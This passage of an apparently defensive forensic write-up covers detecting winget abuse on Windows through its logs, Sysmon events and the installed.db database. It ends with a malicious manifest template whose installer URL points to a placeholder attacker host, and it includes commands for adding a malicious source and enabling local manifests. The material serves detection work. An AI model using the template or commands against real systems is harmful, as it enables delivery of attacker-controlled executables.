

Local Manifest Installation

The typical documented use case in <u>LOLBAS</u> of abusing Winget is via local manifest installs. We an use the same log file to look for executed command along with the domain and binary name

Note

The "install" flag has an alias called "add" that does the same thing. Check source code.

```
2023-04-15 17:21:37.328 [CORE] WinGet, version [1.4.10173], activity [\{7, \Box \Box \}
2023-04-15 17:21:37.328 [CORE] OS: Windows.Desktop v10.0.22621.963
2023-04-15 17:21:37.328 [CORE] Command line Args: winget install -m ops
2023-04-15 17:21:37.328 [CORE] Package: Microsoft.DesktopAppInstaller v1
2023-04-15 17:21:37.328 [CORE] IsCOMCall:0; Caller: winget-cli
2023-04-15 17:21:37.333 [CLI ] WinGet invoked with arguments: 'install'
2023-04-15 17:21:37.333 [CLI ] Found subcommand: install
2023-04-15 17:21:37.333 [CLI ] Leaf command to execute: root:install
2023-04-15 17:21:37.339 [CLI ] Executing command: install
2023-04-15 17:21:37.697 [CLI ] Manifest fields: Name [Opsec], Version [1
2023-04-15 17:21:37.710 [CLI ] Starting installer selection.
2023-04-15 17:21:37.710 [CLI ] Completed installer selection.
2023-04-15 17:21:37.733 [CLI ] Generated temp download path: C:\Users\XX
2023-04-15 17:21:37.734 [CORE] Downloading to path: C:\Users\XXXX\AppDat
2023-04-15 17:21:37.734 [CORE] DeliveryOptimization downloading from url
2023-04-15 17:21:39.939 [CORE] Download completed.
2023-04-15 17:21:39.969 [CORE] Started applying motw to C:\Users\XXXX\Ap
2023-04-15 17:21:39.973 [CORE] Finished applying motw
2023-04-15 17:21:39.974 [CLI ] Installer hash verified
2023-04-15 17:21:39.974 [CORE] Started applying motw using IAttachmentEx
2023-04-15 17:21:40.061 [CORE] Finished applying motw using IAttachmentE
2023-04-15 17:21:40.061 [CLI ] Successfully renamed downloaded installer
2023-04-15 17:21:40.061 [REPO] Creating PredefinedInstalledSource with f
2023-04-15 17:21:40.061 [REPO] Creating new SQLite Index [4294967295.429
2023-04-15 17:21:40.061 [SQL ] Opening SQLite connection #1: ':memory:'
2023-04-15 17:21:40.103 [REPO] Reading MSI UpgradeCodes
2023-04-15 17:21:40.161 [REPO] Examining ARP entries for Machine | X64
2023-04-15 17:21:40.633 [REPO] Examining ARP entries for Machine | X86
2023-04-15 17:21:40.675 [FAIL] D:\a\_work\1\s\external\pkg\src\AppInstal
2023-04-15 17:21:40.675 [REPO] Ignoring duplicate ARP entry Machine | X86 | |
2023-04-15 17:21:40.751 [REPO] Reading MSI UpgradeCodes
2023-04-15 17:21:40.780 [REPO] Examining ARP entries for User | X64
2023-04-15 17:21:40.867 [CLI ] Installer args:
2023-04-15 17:21:40.868 [CLI ] Starting: 'C:\Users\XXXX\AppData\Local\Te
2023-04-15 17:21:43.362 [REPO] Creating PredefinedInstalledSource with f
2023-04-15 17:21:43.362 [REPO] Creating new SQLite Index [4294967295.429
2023-04-15 17:21:43.362 [SQL ] Opening SQLite connection #2: ':memory:'
2023-04-15 17:21:43.424 [REPO] Reading MSI UpgradeCodes
2023-04-15 17:21:43.451 [REPO] Examining ARP entries for Machine | X64
2023-04-15 17:21:43.891 [REPO] Examining ARP entries for Machine | X86
2023-04-15 17:21:43.921 [FAIL] D:\a\_work\1\s\external\pkg\src\AppInstal
2023-04-15 17:21:43.921 [REPO] Ignoring duplicate ARP entry Machine | X86 | |
2023-04-15 17:21:43.982 [REPO] Reading MSI UpgradeCodes
2023-04-15 17:21:44.003 [REPO] Examining ARP entries for User | X64
2023-04-15 17:21:44.262 [CLI ] During package install, 0 changes to ARP
2023-04-15 17:21:44.262 [CLI ] No single entry was determined to be asso
2023-04-15 17:21:44.262 [CLI ] Removing installer: C:\Users\XXXX\AppData
2023-04-15 17:21:44.264 [CLI ] Leaf command succeeded: root:install
```

New Sources

Another potential point of abuse is to add a new malicious source. The command winget source add --name [Name] [URL] can be used to achieve this. You can use the winget-clirestsource repository or New-WinGetSource to setup a new REST based source.

The same log discussed above can be used to spot potential abuse.

Package Installer Logs

There is also a log generated for actual package installations in the same location. The naming convention is <code>Winget-[PackageIdentifier].[PackageIdentifier].YEAR-MONTH-DAY-HOURS-MINUTES-SECONDS-MILLISECONDS.log</code>.

Example: WinGet-Corel.WinZip.27.0.15240-2023-04-16-01-34-35.640

Note

If you use winget in you environement. You could enable verbose logging to get more information during investigations of abuse. To do that, add the following section to the winget settings.json file.

```
"logging": {
    "level": "verbose"
}
```

Event Logs Detection

In order be able to install packages via local manifests the LocalManifestFiles needs to be enabled. There 2 ways of doing it (both require admin privileges)

• Enable LocalManifestFiles via GPO

```
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
  <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf-</pre>
 <EventID>13</EventID>
  <Version>2</Version>
  <Level>4</Level>
  <Task>13</Task>
  <Opcode>0</Opcode>
  <Keywords>0x8000000000000000000(Keywords>
  <TimeCreated SystemTime="2023-04-16T22:27:37.0529098Z" />
  <EventRecordID>1286186526</EventRecordID>
  <Correlation />
  <Execution ProcessID="7704" ThreadID="10028" />
  <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
  <Computer>XXXXX</Computer>
  <Security UserID="S-1-5-18" />
  </System>
- <EventData>
  <Data Name="RuleName">-</Data>
  <Data Name="EventType">SetValue</Data>
  <Data Name="UtcTime">2023-04-16 22:27:37.052</pata>
  <Data Name="ProcessGuid">{9a08371b-75e4-643c-f136-010000002100}
  <Data Name="ProcessId">22936</pata>
  <Data Name="Image">C:\WINDOWS\system32\svchost.exe</Data>
  <Data Name="TargetObject">HKLM\SOFTWARE\Policies\Microsoft\Windows\App
  <Data Name="Details">DWORD (0x00000001)
  <Data Name="User">NT Authority\SYSTEM</Data>
  </EventData>
  </Event>
```

• Enable LocalManifestFiles via the command: winget settings --enable LocalManifestFiles . This will update the virtual application registry designated by \REGISTRY\A

```
<Execution ProcessID="5572" ThreadID="10444" />
 <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
 <Computer>XXXX</Computer>
 <Security UserID="S-1-5-18" />
 </System>
- <EventData>
 <Data Name="RuleName">-</Data>
 <Data Name="EventType">SetValue</Data>
 <Data Name="UtcTime">2023-04-15 15:08:54.017</pata>
 <Data Name="ProcessGuid">{9a08371b-6105-643d-b713-000000002200}
 <Data Name="ProcessId">24836</pata>
 <Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppIn
 <Data Name="TargetObject">\REGISTRY\A\{332bac9b-933b-9869-3579-9d40f5c
 <Data Name="Details">Binary Data
 <Data Name="User">XXXXX</Data>
 </EventData>
 </Event>
```

 During the installation phase the package is downloaded to the temp directory with the following naming convention: %TEMP%\WinGet\[PackageIdentifier].
 [PackageVersion]\

```
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
 <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf-</pre>
 <EventID>11</EventID>
 <Version>2</Version>
 <Level>4</Level>
 <Task>11</Task>
 <Opcode>0</Opcode>
 <Keywords>0x8000000000000000</Keywords>
 <TimeCreated SystemTime="2023-04-17T15:29:07.1090602Z" />
 <EventRecordID>1354370532</EventRecordID>
 <Correlation />
 <Execution ProcessID="5572" ThreadID="10444" />
 <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
 <Computer>XXXX</Computer>
 <Security UserID="S-1-5-18" />
 </System>
- <EventData>
  <Data Name="RuleName">-</pata>
 <Data Name="UtcTime">2023-04-17 15:29:07.108</pata>
 <Data Name="ProcessGuid">{9a08371b-6535-643d-7f16-000000002200}
 <Data Name="ProcessId">12384</pata>
 <Data Name="Image">C:\WINDOWS\System32\svchost.exe</Data>
 <Data Name="TargetFilename">C:\Users\XXXX\AppData\Local\Temp\WinGet\Op
 <Data Name="CreationUtcTime">2023-04-14 15:29:07.108</pata>
 <Data Name="User">NT Authority\SYSTEM</Data>
 </EventData>
 </Event>
```

• The downloaded package gets MoTW applied to it and a Sysmon EID 15 is generated

```
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
 <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf-</pre>
 <EventID>15</EventID>
 <Version>2</Version>
 <Level>4</Level>
 <Task>15</Task>
 <Opcode>0</Opcode>
 <Keywords>0x8000000000000000000(Keywords>
 <TimeCreated SystemTime="2023-04-17T01:22:08.1380168Z" />
 <EventRecordID>1359018022</EventRecordID>
 <Correlation />
 <Execution ProcessID="5572" ThreadID="10444" />
 <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
 <Computer>XXXXX</Computer>
 <Security UserID="S-1-5-18" />
 </System>
- <EventData>
 <Data Name="RuleName">-</pata>
```

```
<Data Name="UtcTime">2023-04-17 01:22:08.137</Data>
<Data Name="ProcessGuid">{9a08371b-f0bd-643d-bf8f-000000002200}</Data>
<Data Name="ProcessId">22824</Data>
<Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppIn
<Data Name="TargetFilename">C:\Users\XXXX\AppData\Local\Temp\WinGet\Op
<Data Name="CreationUtcTime">2023-04-17 01:22:07.823</Data>
<Data Name="Hash">SHA1=67A68EF90A0D9BCD47D62B850D5F14FB6D20DEC7,MD5=80
<Data Name="Contents">[ZoneTransfer] ZoneId=3 HostUrl=http://10.20.2.10

<Data Name="User">XXXXX</Data>
</EventData>
</Event>
```

Installed Packages DB

From a forensic perspective there is also the <code>installed.db</code> database which is a Sqlite database that seems to contains information about installed packages (Publisher, Ids, Name,...etc). I didn't look into it a lot could be useful.

Location:

C:\Users\XXXX\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bb
we\LocalState\Microsoft.Winget.Source_8wekyb3d8bbwe Filename: installed.db

Name	Туре	Schema
✓ ■ Tables (21)		
> 🔳 channels		CREATE TABLE [channels](rowid INTEGER PRIMARY KEY, [channel] TEXT NOT NULL)
> 🔳 commands		CREATE TABLE [commands](rowid INTEGER PRIMARY KEY, [command] TEXT NOT NULL)
> 🔳 commands_map		CREATE TABLE [commands_map]([manifest] INT64 NOT NULL, [command] INT64 NOT NULL)
> 🔳 ids		CREATE TABLE [ids](rowid INTEGER PRIMARY KEY, [id] TEXT NOT NULL)
> III manifest		CREATE TABLE [manifest](rowid INTEGER PRIMARY KEY, [id] INT64 NOT NULL, [name] INT64 NOT NULL, [moniker] INT64 N
> III manifest_metad	ata	CREATE TABLE [manifest_metadata]([manifest] INT64 NOT NULL, [metadata] INT64 NOT NULL, [value] TEXT)
> 🔳 metadata		CREATE TABLE [metadata]([name] TEXT PRIMARY KEY NOT NULL, [value] TEXT NOT NULL)
> III monikers		CREATE TABLE [monikers](rowid INTEGER PRIMARY KEY, [moniker] TEXT NOT NULL)
> 🔳 names		CREATE TABLE [names](rowid INTEGER PRIMARY KEY, [name] TEXT NOT NULL)
> III norm_names		CREATE TABLE [norm_names](rowid INTEGER PRIMARY KEY, [norm_name] TEXT NOT NULL)
> III norm_names_m	ар	CREATE TABLE [norm_names_map]([manifest] INT64 NOT NULL, [norm_name] INT64 NOT NULL)
> III norm_publishers		CREATE TABLE [norm_publishers](rowid INTEGER PRIMARY KEY, [norm_publisher] TEXT NOT NULL)
norm_publishers	_map	CREATE TABLE [norm_publishers_map]([manifest] INT64 NOT NULL, [norm_publisher] INT64 NOT NULL)
pathparts		CREATE TABLE [pathparts](rowid INTEGER PRIMARY KEY, [parent] INT64, [pathpart] TEXT NOT NULL)
> III pfns		CREATE TABLE [pfns](rowid INTEGER PRIMARY KEY, [pfn] TEXT NOT NULL)
> 🗏 pfns_map		CREATE TABLE [pfns_map]([manifest] INT64 NOT NULL, [pfn] INT64 NOT NULL)
> III productcodes		CREATE TABLE [productcodes](rowid INTEGER PRIMARY KEY, [productcode] TEXT NOT NULL)
> m productcodes_m	ар	CREATE TABLE [productcodes_map]([manifest] INT64 NOT NULL, [productcode] INT64 NOT NULL)
> 🔳 tags		CREATE TABLE [tags](rowid INTEGER PRIMARY KEY, [tag] TEXT NOT NULL)
> III tags_map		CREATE TABLE [tags_map]([manifest] INT64 NOT NULL, [tag] INT64 NOT NULL)
> III versions		CREATE TABLE [versions](rowid INTEGER PRIMARY KEY, [version] TEXT NOT NULL)

Example Malicious Manifest

```
Q
PackageIdentifier: OpsecInstaller
PackageName: Opsec
ShortDescription: Opsec test installer
PackageVersion: 1.0.0
PackageLocale: en-US
License: MIT
Publisher: Winget
Installers:
 - Architecture: x64
   InstallerType: exe
   InstallerUrl: http://YOUR-IP/notepad.exe
   InstallerSha256: 972efbb0e7990a0b8404bbf9c7a57b047db169628aba7a017fd8
   #InstallerSha256: 9c2c8a8588fe6db09c09337e78437cb056cd557db1bcf524011
ManifestType: singleton
ManifestVersion: 1.0.0
```